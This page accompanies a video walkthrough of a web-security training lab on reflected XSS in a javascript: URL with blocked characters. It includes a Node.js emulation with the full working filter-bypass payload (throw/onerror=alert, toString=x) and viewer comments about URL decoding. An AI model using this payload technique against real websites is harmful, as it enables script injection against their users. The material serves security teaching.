Reflected XSS in a JavaScript URL with some characters blocked - Explaining the Payload

This is a fairly tricky XSS lab with the title 'Reflected XSS in a JavaScript URL with some characters blocked'.

We break down the payload into sections and explore the underlying JavaScript to get a full understanding of how the payload works.

Support This Channel
======================

Please like and subscribe, it means a lot!

Join our Discord

00:00 Introduction
00:31 Analysing the decoded payload
03:13 JavaScript throw
05:55 Onerror = alert
07:50 The arrow function
09:50 toString = x
12:36 The injection
15:03 Superfluous function arguments
20:17 Exiting the injection
21:03 Solving the lab
21:42 Post analysis
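The chapters above walk through the payload one construct at a time. As an added example (not code from the video, the lab, or PortSwigger), the Node.js script below emulates what the browser does with the lab's javascript: URL so each piece can be seen working in isolation: the throw trick that assigns onerror=alert and then throws 1337 (calling alert with no parentheses), the arrow function x=>{...} defined without parentheses, toString=x plus window+'' to invoke x without parentheses, and the fact that all of this rides along as superfluous extra arguments to fetch. Everything browser-specific is an assumption and is stubbed: window, alert, fetch, and the delivery of an uncaught exception to window.onerror as a message string. The vulnerable URL is a constructed stand-in shaped like the lab's link, not the lab's actual page source. It also shows the percent-decoding step that several commenters below ask about: the browser decodes the body of a javascript: URL before evaluating it, which is why a reflected %27 still acts as a quote at run time.

```javascript
// Added example, not code from the video or from PortSwigger. Node.js emulation
// of the JavaScript mechanics behind the lab payload. Browser-only parts
// (window, alert, fetch, window.onerror dispatch) are stubs, labelled below.

const alertCalls = [];   // every value the stubbed alert receives
let fetchCalls = 0;      // how often the stubbed fetch body is actually entered

globalThis.window = globalThis;   // assumption: in a browser, window === globalThis
globalThis.alert = (msg) => { alertCalls.push(String(msg)); };
globalThis.fetch = () => { fetchCalls += 1; return Promise.resolve(); };

// The body of a javascript: URL is percent-decoded before it is evaluated.
function javascriptUrlSource(url) {
  if (!url.startsWith("javascript:")) throw new Error("not a javascript: URL");
  return decodeURIComponent(url.slice("javascript:".length));
}

// Helper that percent-encodes every character except unreserved ones, to
// model the server reflecting the parameter in encoded form (assumption).
function percentEncodeAll(s) {
  return s.replace(/[^A-Za-z0-9_.~-]/g,
    (c) => "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0"));
}

// Evaluate the decoded source the way a browser evaluates a javascript: URL:
// in sloppy mode (a bare `x=...` creates a global, `toString=x` overwrites
// window.toString) and with an uncaught exception handed to window.onerror.
// Emulation assumption: the browser passes a message string such as "Uncaught 1337".
function runLikeJavascriptUrl(url) {
  const body = new Function(javascriptUrlSource(url)); // Function bodies are never strict
  try {
    body();
  } catch (err) {
    if (typeof globalThis.onerror !== "function") throw err;
    globalThis.onerror("Uncaught " + err);
  }
}

// Constructed stand-in for the vulnerable page: a javascript: URL whose string
// literal contains the reflected postId. Decoded, the injected part is
//   '},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'
// which maps onto the chapters:
//   throw <expr>           comma operator: assign onerror=alert, then throw 1337
//   x=x=>{...}             arrow function defined without "(" or ")"
//   toString=x, window+''  string conversion of window invokes x, no "()" needed
//   fetch(a, b, c, d, e, f) the injected pieces become superfluous arguments
const injected = "'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'";
const craftedUrl =
  "javascript:fetch('/analytics',{method:'post',body:'/post?postId=5" +
  percentEncodeAll(injected) +
  "'})";

// Returns what alert saw and whether fetch was ever entered. Arguments are
// evaluated left to right before the call, and `window+''` throws while they
// are still being built, so the fetch body itself is never reached.
function detonate() {
  alertCalls.length = 0;
  fetchCalls = 0;
  try {
    runLikeJavascriptUrl(craftedUrl);
  } finally {
    delete globalThis.onerror;   // undo the globals the payload created
    delete globalThis.toString;
    delete globalThis.x;
  }
  return { alerts: alertCalls.slice(), fetchEntered: fetchCalls > 0 };
}

// Without the injection the same URL just performs the analytics request.
function benignRequest() {
  fetchCalls = 0;
  runLikeJavascriptUrl("javascript:fetch('/analytics',{method:'post',body:'/post?postId=5'})");
  return fetchCalls === 1;
}

console.log(detonate());   // alert received "Uncaught 1337"; fetch never entered
```

Run it with a current Node.js (the stubbed fetch replaces the built-in one for the duration of the script). The two things the chapter list alone does not make obvious are visible in the result: alert receives the error message the browser builds around 1337, not the bare value, and the analytics request in the host URL is never sent because the throw happens during argument evaluation.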
Comments
Author

Thank you for your exhaustive step-by-step explanation. The PortSwigger explanation is definitely not enough. Your videos allow us to appreciate the tricks used in this exploit.

marcr
Author

You're the best at explaining the lab and XSS—I absolutely love your explanations!

mehrabamv
Author

This is extremely helpful! I am not really familiar enough with JS, but I really wanted to understand this lab, and it would be so bad without your explanation. Thank you a million times!

pinkypink
Author

Best explanation ever!!! Really crazy and very simple to understand, and I wish you the very best!!!

sabarishAB-yo
Author

This is a god-level explanation. Thanks, sir 🙏🙏

souravpaul_per
Author

Amazing! I would have changed the last 'x' to another letter just to not get confused with the function x previously defined; for example, ,window+'',{a:' also works. Thanks for these videos.

Paul-Dirac
Author

JUST ABSOLUTELY CRAZY EXPLANATION! SUPER SIMPLIFIED!!!

normaliteeos
Author

Thank you so much for this video. Ever since I found your channel you have been my savior in understanding some of the expert labs. So really thank you so

andre-njx
Author

Really well done course! Thanks for your content!

Mr.Manimal
Author

Dude, this is really great. You are clearly explaining with custom code, thank you.

pv
Author

Thanks a lot, man, this is great. I mean, awesome to give us a detailed explanation 🔥

.sayanthsunil
Author

BEAUTIFULLY explained, thank you very much!

mohsinhafeez
Author

Really amazing and detailed explanation! Thank you!

Sofi-pszc
Author

Absolutely splendid explanation, thank you so much

YousefAmmar-td
Author

Thanks a lot! Detailed and clear, satisfactory indeed.

akemi-ihky
Author

Thank you! There is one thing that I would like explained. When you pass in the correct query param to solve the lab, and you look at the HTML of the returned response, it does not look like the code passed in the query string was successfully injected. E.g. you do not see an actual single quote to close the value of the body property in the fetch payload. Instead, you see an encoded single quote, which is not valid JavaScript.

I guess the browser decodes the javascript: URL before executing it, but I do wonder about that.

scharfer
Author

I could see the reflection point in the source... that's it, then I am for the video... I still couldn't understand why the toString and window are required in our payload...

pranjalruhela
Author

Thanks for this great explanation ♥
I have a question: how does the JavaScript work while the equal signs are encoded?

ossamayasser
Author

Nice one. I have one question and one comment. The question is: how does the XSS happen when the URL is encoded and the payload is also encoded? And the comment is that it's not the parameter that is vulnerable but the URL being reflected in the page.

neadlead